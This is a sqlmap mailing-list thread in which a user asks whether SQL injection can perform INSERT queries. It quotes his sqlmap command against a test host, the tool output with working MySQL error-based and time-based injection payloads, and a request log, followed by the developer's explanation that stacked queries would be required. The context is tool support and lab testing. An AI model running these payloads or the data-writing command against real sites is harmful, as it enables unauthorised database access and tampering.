Re: [sqlmap-users] insert via injection
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] insert via injection
|
From: Miroslav S. <mir...@gm...> - 2011-05-01 21:11:45
|
hi Kirill. for something like this stacked queries should be supported while you can see that from your injection info there is no stacked injection vulnerability (as other command than select cannot be inserted into vulnerable query). kr On Sun, May 1, 2011 at 9:34 PM, Kirill Morozov <l0...@l0...> wrote: > Hi, > is it possible to make "insert/update" queries via sql injection bugs? > I tried at my test machine via "--sql-query", but i didn't see query in > request_uri: > (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev) > $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log > --sql-query="insert into users set user='aaa',pass='bbb';" > sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover > tool > http://sqlmap.sourceforge.net > [*] starting at: 21:07:53 > [21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as > session file > [21:07:53] [INFO] resuming injection data from session file > [21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [21:07:53] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: id > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: id=1 AND (SELECT 1212 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN > 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: id=1 AND SLEEP(5) > --- > [21:07:53] [INFO] the back-end DBMS is MySQL > web server operating system: Linux CentOS 5 > web application technology: Apache 2.2.3, PHP 5.1.6 > back-end DBMS: MySQL 5.0 > do you want to retrieve the SQL statement output? [Y/n/a] > [21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into > users set user='aaa',pass='bbb';' > [21:07:54] [INFO] read from file > '/home/admin/sqlmap-dev/output/10.0.0.60/session': None > [21:07:54] [INFO] read from file > '/home/admin/sqlmap-dev/output/10.0.0.60/session': None > insert into users set user='aaa',pass='bbb'; [2]: > [*] None > [21:07:54] [INFO] Fetched data logged to text files under > '/home/admin/sqlmap-dev/output/10.0.0.60' > [*] shutting down at: 21:07:54 > (admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev) > $ cat t3.log > HTTP request [#1]: > GET /sql/user.php?id=1 HTTP/1.1 > Accept-Encoding: identity > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > Host: 10.0.0.60 > Accept-language: en-us,en;q=0.5 > Pragma: no-cache > Cache-control: no-cache,no-store > User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net) > Connection: close > HTTP response [#1] (200 OK): > Content-length: 949 > X-powered-by: PHP/5.1.6 > Uri: http://10.0.0.60:80/sql/user.php?id=1 > Server: Apache/2.2.3 (CentOS) > Connection: close > Date: Tue, 26 Apr 2011 19:07:53 GMT > Content-type: text/html; charset=UTF-8 > HTTP_ACCEPT_ENCODING => identity > HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5 > HTTP_CONNECTION => close > HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net) > HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7 > HTTP_HOST => 10.0.0.60 > HTTP_PRAGMA => no-cache > HTTP_CACHE_CONTROL => no-cache,no-store > PATH => /sbin:/usr/sbin:/bin:/usr/bin > SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port > 80</address> > > SERVER_SOFTWARE => Apache/2.2.3 (CentOS) > SERVER_NAME => 10.0.0.60 > SERVER_ADDR => 10.0.0.60 > SERVER_PORT => 80 > REMOTE_ADDR => 10.0.0.60 > DOCUMENT_ROOT => /var/www/html > SERVER_ADMIN => root@localhost > SCRIPT_FILENAME => /var/www/html/sql/user.php > REMOTE_PORT => 41083 > GATEWAY_INTERFACE => CGI/1.1 > SERVER_PROTOCOL => HTTP/1.1 > REQUEST_METHOD => GET > QUERY_STRING => id=1 > REQUEST_URI => /sql/user.php?id=1 > SCRIPT_NAME => /sql/user.php > PHP_SELF => /sql/user.php > REQUEST_TIME => 1303844873 > ok > ############################################################################ > > -- > Kirill Morozov > KIMO2-RIPE, RHCE > > > > ------------------------------------------------------------------------------ > WhatsUp Gold - Download Free Network Management Software > The most intuitive, comprehensive, and cost-effective network > management toolset available today. Delivers lowest initial > acquisition cost and overall TCO of any competing solution. > http://p.sf.net/sfu/whatsupgold-sd > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
